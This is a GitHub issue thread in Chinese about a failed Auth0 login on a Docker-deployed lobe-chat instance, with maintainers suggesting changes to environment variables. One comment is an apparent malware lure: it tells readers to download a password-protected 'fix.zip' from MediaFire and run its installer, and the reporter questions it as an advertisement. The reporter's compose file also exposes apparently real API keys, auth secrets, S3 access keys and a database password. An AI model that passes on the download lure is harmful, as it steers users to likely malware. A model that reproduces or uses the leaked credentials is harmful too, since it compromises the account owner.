### ISSUE TITLE
[Bug] 你好我是上周五提问的，登录客户端显示无权限，我现在点击登陆了还是不行可否帮忙看一下

### ISSUE THREAD

**Issue by zhangleijun111** [lobehub/lobe-chat#3611]
### 📦 Environment

Docker

### 📌 Version

centos

### 💻 Operating System

Other

### 🌐 Browser

Chrome

### 🐛 Bug Description

你好这是我的docker-compose文件version: '3.8'

services:
  lobe-chat:
    image: registry.us-west-1.aliyuncs.com/jg-images/lobe-chat-database
    container_name: lobe-chat-database
    restart: always
    ports:
      - '3210:3210'
    environment:
      - ENABLED_OPENAI=0
      - ENABLED_OLLAMA=0
      - ZHIPU_API_KEY=ddf469a2bcf803222e61670PGEcQLawcJZRbOVT
      - NEXT_PUBLIC_SERVICE_MODE=server
      - DATABASE_DRIVER=node
      - DATABASE_URL=postgresql://root:888888@postgres:5432/lobechat
      - KEY_VAULTS_SECRET=HS3QatiOGTjX0lpmqwB6IlY5qsiZUYBkUXE=
      - NEXT_AUTH_SECRET=MXUGkx2RfBY0rePJK7fzqYU+vBNkOcJAEd84=
      - NEXT_AUTH_SSO_PROVIDERS=auth0
      - AUTH0_CLIENT_ID=WgZ83tpb0EBnYd5hABM1cF4dP
      - AUTH0_CLIENT_SECRET=AGbO8Ju_P9SkPfbfxf3bmP3T4S8axRuIoVtnUoULMyJJwYR9PfSs4WaAA
      - AUTH0_ISSUER=https://dev-ue0bho7deevh.us.auth0.com
      - NEXTAUTH_URL=https://dev-ue0bho7deevh.us.com/api/auth
      - S3_BUCKET=lobechat
      - S3_ENDPOINT=https://a8b7163e9e32d5e65071f738.r2.cloudflarestorage.com
      - NEXT_PUBLIC_S3_DOMAIN=https://s3-for-lobechat.dev-uefv0bho7deevh.us.com
      - S3_ACCESS_KEY_ID=54b7e7a708e9a6d803e974bbb
      - S3_SECRET_ACCESS_KEY=8d8765e83416a88211af8124dd6b763ed94ba117f1031ce0f10336
      - APP_URL=http://localhost:3210

    networks:
      - lobechat
      - postgres

  postgres:
    image: registry.us-west-1.aliyuncs.com/jg-images/pgvector:pg16
    container_name: postgres
    restart: always
    environment:
      POSTGRES_DB: lobechat
      POSTGRES_USER: root
      POSTGRES_PASSWORD: 888888
    volumes:
      - postgres_data:/var/lib/postgresql/data
    networks:
      - postgres
    ports:
      - '5432:5432'

networks:
  lobechat:
    driver: bridge
  postgres:
    driver: bridge

volumes:
  postgres_data:

### 📷 Recurrence Steps

这是客户端的报错信息，以后auth的后台
![337169a03b40ba1f125d9a115b9051b](https://github.com/user-attachments/assets/6ca20054-bf99-4384-b67d-a2ff35eb6d84)
![d3a8a2fa08e96646bdd73c2bf7c49ca](https://github.com/user-attachments/assets/be8cc604-93cb-4e70-8ffa-c4bc65b788d5)
![Uploading 7577b5b50cdd3d1c533eecaa68b6be6.png…]()

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zhangleijun111** [comment]
> 下载 https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file 密码：changeme 在安装程序菜单中，选择“gcc”。

这是广告？

**Comment by SpeedupMaster** [comment]
DATABASE_URL=postgres://postgres:mysecretpassword@my-postgres:5432/postgres

**Comment by SpeedupMaster** [comment]
> > DATABASE_URL=postgres：//postgres：888888@postgres：5432/postgres S3_PUBLIC_DOMAIN=https://s3-for-lobechat.dev-uefv0bho7deevh.us.com
> 
> 你好这两句话哪里不对可否告知一下

NEXT_PUBLIC_S3_DOMAIN 这个现在改成 S3_PUBLIC_DOMAIN 了 #3527 
DATABASE_URL=postgresql://root:888888@postgres:5432/lobechat 
这个看了下好像没有问题.... 
你可以直接用这个docker compose文件，只修改环境变量试试看 #3569

**Comment by zhangleijun111** [comment]
> > Bot 检测到 issue body 的语言不是英文，自动翻译。👯👭🏻🧑‍🤝‍🧑👫🧑🏿‍🤝‍🧑🏻👩🏾‍🤝‍👨🏿👬🏿
> 
> > > DATABASE_URL=postgres：//postgres：888888@postgres：5432/postgres S3_PUBLIC_DOMAIN=https://s3-for-lobechat.dev-uefv0bho7deevh.us.com
> > 
> > 
> > 您好，您能告诉我这两句话有什么问题吗？
> 
> NEXT_PUBLIC_S3_DOMAIN 这个现在改成S3_PUBLIC_DOMAIN #3527 DATABASE_URL=postgresql：//root：888888@postgres：5432/lobechat 看了看，好像没问题......你可以直接使用这个 docker compose 文件，直接修改环境变量来试试 #3569
你好我一修改为S3_PUBLIC_DOMAIN还是不行，点击登录网页无法显示如图

**Comment by SpeedupMaster** [comment]
- NEXT_PUBLIC_SERVICE_MODE=server
- DATABASE_DRIVER=node
Docker 部署这两个环境变量不用设置

**Comment by SpeedupMaster** [comment]
看不到图片

**Comment by zhangleijun111** [comment]
> 看不到图片
现在呢
![c2da79bcf2fe8d1e858d16928e50ce9](https://github.com/user-attachments/assets/fb716724-b956-4c63-8135-f000925cb82e)

**Comment by zhangleijun111** [comment]
> 看不到图片

点击登录的时候就会这个样子，我还没到上传文件这一步

**Comment by SpeedupMaster** [comment]
> > 看不到图片
> > 现在呢
> > ![c2da79bcf2fe8d1e858d16928e50ce9](https://private-user-images.githubusercontent.com/169867372/361392611-fb716724-b956-4c63-8135-f000925cb82e.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2NzY3ODYsIm5iZiI6MTcyNDY3NjQ4NiwicGF0aCI6Ii8xNjk4NjczNzIvMzYxMzkyNjExLWZiNzE2NzI0LWI5NTYtNGM2My04MTM1LWYwMDA5MjVjYjgyZS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwODI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDgyNlQxMjQ4MDZaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1jYjljMzgzMDJjNjI1MjFlMzliM2M0YTliOTk2NjI3YjY5MTc5OWYxYWZmMmFhMDg2NjFhMDQ1YmM0NjMzMDg3JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.f6JOjMffX2Cbzd3yLH8NPzYpGqmMY-QG9l40P2e78v8)

用你的docker compose在windows上部署没出现这个界面

**Comment by zhangleijun111** [comment]
这是centos的问题？





发自我的iPhone


------------------ 原始邮件 ------------------
发件人: SpeedupMaster ***@***.***&gt;
发送时间: 2024年8月26日 22:28
收件人: lobehub/lobe-chat ***@***.***&gt;
抄送: zhangleijun111 ***@***.***&gt;, Mention ***@***.***&gt;
主题: Re: [lobehub/lobe-chat] [Bug] 你好我是上周五提问的，登录客户端显示无权限，我现在点击登陆了还是不行可否帮忙看一下 (Issue #3611)
